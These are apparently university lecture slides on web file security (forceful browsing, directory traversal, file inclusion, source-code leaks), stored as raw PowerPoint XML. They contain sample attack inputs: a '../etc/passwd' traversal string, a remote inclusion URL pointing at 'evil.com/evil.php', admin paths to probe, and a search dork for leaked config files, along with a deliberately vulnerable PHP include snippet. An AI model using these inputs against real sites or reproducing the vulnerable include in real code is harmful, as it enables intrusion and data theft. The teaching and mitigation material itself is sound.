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68" r:id="rId2"/>
    <p:sldId id="269" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="377" r:id="rId5"/>
    <p:sldId id="378" r:id="rId6"/>
    <p:sldId id="379" r:id="rId7"/>
    <p:sldId id="381" r:id="rId8"/>
    <p:sldId id="382" r:id="rId9"/>
    <p:sldId id="383" r:id="rId10"/>
    <p:sldId id="380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2" r:id="rId19"/>
    <p:sldId id="393" r:id="rId20"/>
    <p:sldId id="394" r:id="rId21"/>
    <p:sldId id="395" r:id="rId22"/>
    <p:sldId id="396" r:id="rId23"/>
    <p:sldId id="397" r:id="rId24"/>
    <p:sldId id="270" r:id="rId25"/>
    <p:sldId id="265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B200"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="E0E0E0"/>
    <a:srgbClr val="133C5D"/>
    <a:srgbClr val="1310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609" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="-11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366F15-64CE-44F6-AF51-8F568C022106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05D92-3DF3-46AE-AA3E-E4F00EDCEF5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D343F-1CE6-4DBC-81D0-0B6C4F0D4CEA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1478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C9297-094B-4D43-A2BC-251F70F7FAC6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789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516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516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01244-2662-4920-9F2A-89027007E985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04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B9F28C-CA03-417A-BB11-4581E88297A7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882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3CE42-88DE-4DAE-BEE6-F990EFC56C39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0202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64820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561E9-EBCB-4F75-92F3-F2DCBCACB9FA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64234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4040188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28801"/>
            <a:ext cx="4040188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219200"/>
            <a:ext cx="4041775" cy="6096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28801"/>
            <a:ext cx="4041775" cy="40386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1A2E2A-7803-4D06-A8B8-49F1F33489B9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6356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2B316-30AA-4DF3-9FF0-A99B6D420566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596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9DDD29-E6DC-41B0-9328-87E0347E6B3D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9448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5943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4323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90766-FF88-4569-AE43-2DC25C757AC3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001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5000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5A12-29E9-4A8B-BF11-BE0A3FC00240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4736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6482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5AD201-9091-4BC7-8645-E6644BE2C723}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/3/2013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246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246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D7F6B3-FE9A-4A71-A476-BA18060D407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63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xploit-db.com/google-dorks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search?q=site:github.com+inurl:sftp-config.json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ISEC 400 Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Week 12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Copyright © 2013 Todd Whittaker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(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todd.whittaker@franklin.edu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55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66057" y="1447800"/>
            <a:ext cx="8213436" cy="38862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# Blacklist all file types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Files ~ ""&gt;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order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allow,deny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allow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from none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deny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from all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&lt;/Files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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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# Whitelist only these file types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&lt;Files ~ "\.(</a:t>
            </a:r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gif|jpe?g|png|html|htm|php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)$"&gt;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order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allow,deny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allow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from all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deny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from none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&lt;/Files&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="4267200"/>
            <a:ext cx="4487718" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72854"/>
              <a:gd name="adj2" fmla="val -5537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Could install a handler for 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and 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tmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> files, or use a blacklist/whitelist approach for all files.  Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> shown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438400" y="6400800"/>
            <a:ext cx="2339871" cy="27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Source: http://uclue.com/?xq=367</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5664732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secrets out of static files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t give out information that helps an attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comments in HTML or JavaScript can leak version history, bugs, developer names, login credentials, keys, passwords, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The same can be said for hard coded variables containing credentials in source code.  These should be very carefully protected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57885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Forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to insecure direct object references, but exploiting the file system rather than a database key.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057" y="3352800"/>
            <a:ext cx="8213436" cy="2590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http://somesite.com/admin.php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somesite.com/admin/index.php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somesite.com/admin.html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somesite.com/admin/index.html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somesite.com/private/index.html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somesite.com/logs/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somesite.com/test/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somesite.com/debug/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somesite.com/scripts/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endParaRPr lang="en-US" dirty="0" smtClean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6" name="Rounded Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5061857" y="2209800"/>
            <a:ext cx="3548743" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43711"/>
              <a:gd name="adj2" fmla="val 87482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All resources that an attacker would try to find by forceful browsing.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5231363" y="4876800"/>
            <a:ext cx="3150637" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -81310"/>
              <a:gd name="adj2" fmla="val -33606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Directory enumeration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83325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Forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File naming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presence of a file called “000575.jpg” can trigger a probe for a file called “000576.jpg”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See: “Google hacking” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.exploit-db.com/google-dorks/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3224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Forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Status code changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP code 404 is for “not found”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fishing for a directory, if the user suddenly gets a 403 code instead of a 404, then they’ve identified a valid directory or resource.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9027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Forceful browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Workflow changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can’t rely on a client to enforce a workflow through a set of pages (i.e. shopping cart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings 3"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> payment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings 3"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shipping).  That workflow must be enforced on the server.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73654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traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to “OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> redirects and forwards”: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Now, we’re using a file downloader or selector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895600"/>
            <a:ext cx="6825343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www.somesite.com/redirect.php?url=evil.com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4419600"/>
            <a:ext cx="6825343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www.somesite.com/download.php?file=cats.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15995779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Directory traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to “OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> redirects and forwards”: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Now, we’re using a file downloader or selector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95400" y="2895600"/>
            <a:ext cx="6825343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www.somesite.com/redirect.php?url=evil.com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95400" y="4419600"/>
            <a:ext cx="6825343" cy="5334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http://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www.somesite.com/download.php?file=cats.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="1973424"/>
            <a:ext cx="4648200" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 51380"/>
              <a:gd name="adj2" fmla="val 124047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Vulnerable to injection attacks.  Replace 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cats.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with 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..%2F..%2Fetc%2Fpasswd%0A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2404473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inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using user input as an included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74640"/>
            <a:ext cx="8382000" cy="3187959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'get'&gt;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'layout'&gt;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standard.php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Standard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mobile.php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Mobile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83767" y="4921119"/>
            <a:ext cx="4876800" cy="128296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&lt;?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$layout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$_REQUEST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[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layout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]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/>
              </a:rPr>
              <a:t>include_once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($layout)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?&gt;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32710526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inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using user input as an included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74640"/>
            <a:ext cx="8382000" cy="3187959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'get'&gt;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'layout'&gt;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standard.php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Standard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mobile.php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Mobile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83767" y="4921119"/>
            <a:ext cx="4876800" cy="128296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&lt;?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$layout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$_REQUEST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[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layout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]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/>
              </a:rPr>
              <a:t>include_once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($layout)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?&gt;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029200" y="3352800"/>
            <a:ext cx="3200400" cy="1074576"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -50661"/>
              <a:gd name="adj2" fmla="val 13012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Untrusted input directly including a file.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28750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week’s expected outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upcoming deadlines</a:t>
            </a:r>
          </a:p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F047CB-F391-4DAB-9FB4-A73A580B607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0690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inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using user input as an included file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74640"/>
            <a:ext cx="8382000" cy="3187959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method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'get'&gt;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name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'layout'&gt;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standard.php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Standard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value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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>mobile.php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'&gt;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Mobile layout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option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select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input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>type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=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"submit" /&gt;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form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body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  <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>html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&gt;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83767" y="4921119"/>
            <a:ext cx="4876800" cy="128296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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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$layout 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= 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$_REQUEST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[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layout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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>]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>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>include_once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($layout)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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5029200" y="3352800"/>
            <a:ext cx="3200400" cy="1074576"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -50661"/>
              <a:gd name="adj2" fmla="val 130125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Untrusted input directly including a file.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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8" name="Rounded Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488302" y="996818"/>
            <a:ext cx="6934201" cy="2971801"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -605"/>
              <a:gd name="adj2" fmla="val 87111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Could have been:</a:t>
            </a:r>
          </a:p>
          <a:p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://somesite.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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layout.php?layout</a:t>
            </a:r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=..%2F..%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2Fetc%2Fpasswd%0A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Or worse:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400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http://somesite.com/layout.php?layout=http%3A%2F%2Fevil.com%2Fevil.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400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2586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Canonicalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multiple names can refer to the same file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e.g. http://somesite.com/index.html could also be http://192.168.1.1/INDEX.HTML depending on the OS being run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Whitelisting/blacklisting cannot be used without first ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>canonicalizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ the names of resources.  Use the library of your language.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3084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 in file security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t expose source code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configure web server file types appropriately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use real source code control, not ad-hoc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strip comments from HTML, CSS, JS that is served</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Keep secrets (keys, passwords, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) out of static files (such as </a:t>
            </a:r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www.google.com/search?q=site%3Agithub.com+inurl%3Asftp-config.json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26915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practices in file security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevent directory traversals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Turn off directory indexing in the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configure web server to always return the same error code for non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>existant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and unauthorized resources (i.e. all 404s or all 403s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Private directories hidden by obscurity aren’t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Workflow must be enforced on the server side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make decisions based on user input, never execute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4027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deadlines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29952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&amp; answer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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comments?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Concerns?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145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Demonstrate directory traversal and command injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Critique mitigation approaches for file security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe best practices for configuration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65246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source code secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note, not “security by obscurity” but “security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> obscurity.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web has advantages over desktops</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A properly configured web app is a black box to attackers; can only probe the doors that exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A desktop application is subject to much more thorough and intense scrutiny, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, fuzzing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, without the author knowing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9152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source code secret: leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Misconfigured web server file types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most web servers understand certain file types and set response headers appropriately (i.e. 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jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, 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gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Certain files are treated by being processed first, such as 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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files.  In the Apache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httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file: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057" y="4267200"/>
            <a:ext cx="8213436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FilesMatch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\.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php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SetHandler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application/x-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httpd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FilesMatch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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42604443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source code secret: leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Misconfigured web server file types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most web servers understand certain file types and set response headers appropriately (i.e. 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jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, .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gif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Certain files are treated by being processed first, such as .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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files.  In the Apache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httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file: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66057" y="4267200"/>
            <a:ext cx="8213436" cy="1066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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;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FilesMatch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\.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php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$&gt;</a:t>
            </a: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    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SetHandler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 application/x-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httpd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-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php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>FilesMatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3894282" y="1600200"/>
            <a:ext cx="4106718" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43953"/>
              <a:gd name="adj2" fmla="val 118184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What about other source code files such as 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inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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2400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tmpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that could also leak information?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84528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source code secret: leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Misconfigured web server file types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By default, everything not “processed” by a handler is just sent back as a file download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Backup file leaks: developers making backup files in the same directory, and then those are pushed to deployment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752599" y="4419600"/>
            <a:ext cx="2819401" cy="1828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index.php.bak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index.bak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~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index.php.1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index.php.orig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index.php.old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</p:spTree>
    <p:extLst>
